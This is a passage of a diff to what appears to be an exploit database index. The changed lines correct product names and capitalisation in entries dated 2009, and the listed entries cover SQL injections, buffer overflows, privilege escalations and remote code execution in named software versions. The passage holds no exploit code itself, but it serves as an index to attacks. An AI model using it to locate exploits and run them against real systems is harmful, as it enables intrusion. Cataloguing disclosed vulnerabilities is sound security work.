4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 @@ -7635,7 +7635,7 @@ id,file,description,date,author,platform,type,port 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Authentication Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0 -8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 +8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0 @@ -7648,13 +7648,13 @@ id,file,description,date,author,platform,type,port 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0 8117,platforms/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",windows,remote,0 -8118,platforms/windows/remote/8118.html,"Orbit 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0 +8118,platforms/windows/remote/8118.html,"Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow",2009-02-27,JavaGuru,windows,remote,0 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8121,platforms/windows/local/8121.pl,"Hex Workshop 6.0 - '.hex' Local Code Execution",2009-02-27,DATA_SNIPER,windows,local,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 -8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 - '.m3u' File Local Buffer Overflow (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 +8126,platforms/windows/local/8126.py,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 @@ -7663,7 +7663,7 @@ id,file,description,date,author,platform,type,port 8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 -8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Files Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 +8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 8137,platforms/windows/local/8137.py,"Media Commands - '.m3u' Local Overwrite (SEH)",2009-03-02,His0k4,windows,local,0 8138,platforms/windows/local/8138.c,"VUplayer 2.49 - '.cue' Local Buffer Overflow",2009-03-02,"Assed Edin",windows,local,0 @@ -7760,7 +7760,7 @@ id,file,description,date,author,platform,type,port 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - (qorder) SQL Injection",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - '.cue' Stack Overflow",2009-03-19,Stack,windows,local,0 -8243,platforms/php/webapps/8243.txt,"bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 +8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0 @@ -7770,7 +7770,7 @@ id,file,description,date,author,platform,type,port 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 -8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 +8253,platforms/windows/remote/8253.c,"Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 @@ -7841,7 +7841,7 @@ id,file,description,date,author,platform,type,port 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0 8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0 -8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 +8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 @@ -7866,7 +7866,7 @@ id,file,description,date,author,platform,type,port 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 -8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 +8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 @@ -7988,7 +7988,7 @@ id,file,description,date,author,platform,type,port 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 -8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 +8475,platforms/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)",2009-04-20,kingcope,linux,local,0 @@ -8125,7 +8125,7 @@ id,file,description,date,author,platform,type,port 8612,platforms/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",windows,local,0 8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - (CWD Response) Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0 -8615,platforms/php/webapps/8615.txt,"tematres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 +8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0 8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,php,webapps,0 @@ -8273,7 +8273,7 @@ id,file,description,date,author,platform,type,port 8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,windows,remote,0 8766,platforms/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps,0 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0 -8769,platforms/php/webapps/8769.txt,"ZaoCMS - (user_id) SQL Injection",2009-05-22,Qabandi,php,webapps,0 +8769,platforms/php/webapps/8769.txt,"ZaoCMS - 'user_id' SQL Injection",2009-05-22,Qabandi,php,webapps,0 8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Overwrite (SEH)",2009-05-22,His0k4,windows,local,0 8771,platforms/php/webapps/8771.htm,"ZaoCMS - 'user_updated.php' Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0 8772,platforms/windows/local/8772.pl,"Winamp 5.55 - (MAKI script) Universal Integer Overflow",2009-05-22,"Encrypt3d.M!nd ",windows,local,0 @@ -8302,7 +8302,7 @@ id,file,description,date,author,platform,type,port 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",php,webapps,0 8796,platforms/php/webapps/8796.htm,"Gallarific - 'user.php' Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 -8798,platforms/windows/dos/8798.rb,"Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC)",2009-05-26,"Kevin Finisterre",windows,dos,0 +8798,platforms/windows/dos/8798.rb,"Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC)",2009-05-26,"Kevin Finisterre",windows,dos,0 8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps,0 @@ -8312,7 +8312,7 @@ id,file,description,date,author,platform,type,port 8806,platforms/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,windows,remote,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 -8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 +8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 8811,platforms/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps,0 8812,platforms/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Remote/Temporary File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps,0 @@ -8321,18 +8321,18 @@ id,file,description,date,author,platform,type,port 8815,platforms/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - (fiche) Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps,0 8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - (THEME_FOLDER) Local File Inclusion",2009-05-27,ahmadbady,php,webapps,0 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,php,webapps,0 -8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps,0 +8818,platforms/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps,0 8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 -8823,platforms/php/webapps/8823.txt,"WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 +8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 -8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 +8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 @@ -8420,7 +8420,7 @@ id,file,description,date,author,platform,type,port 8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0 -8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 +8922,platforms/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 @@ -8477,7 +8477,7 @@ id,file,description,date,author,platform,type,port 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 -8982,platforms/linux/dos/8982.txt,"compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 +8982,platforms/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - 'dlpcrypt.sys' Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 @@ -8601,7 +8601,7 @@ id,file,description,date,author,platform,type,port 9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 -9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 +9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - (.rws Parsing) Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - (WindsPly.ocx) Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 @@ -8650,7 +8650,7 @@ id,file,description,date,author,platform,type,port 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers - Denial of Service",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0 -9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) - ActiveX Buffer Overflow (PoC)",2009-07-16,anonymous,windows,dos,0 +9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (OWC) Spreadsheet - ActiveX Buffer Overflow (PoC)",2009-07-16,anonymous,windows,dos,0 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 @@ -8693,7 +8693,7 @@ id,file,description,date,author,platform,type,port 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Privilege Escalation",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Privilege Escalation",2009-07-20,anonymous,linux,local,0 -9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 +9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 @@ -8715,7 +8715,7 @@ id,file,description,date,author,platform,type,port 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Permanent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",windows,local,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure",2009-07-23,NoGe,php,webapps,0 -9236,platforms/php/webapps/9236.txt,"GLinks 2.1 - (cat) Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 +9236,platforms/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - (cat) Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 @@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port 9258,platforms/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9261,platforms/php/webapps/9261.txt,"XOOPS celepar module qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 +9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 9264,platforms/linux/dos/9264.py,"stftp 1.10 - (PWD Response) Remote Stack Overflow (PoC)",2009-07-27,sqlevil,linux,dos,0 @@ -8801,14 +8801,14 @@ id,file,description,date,author,platform,type,port 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion",2009-08-01,NoGe,php,webapps,0 -9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 +9323,platforms/multiple/dos/9323.txt,"Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 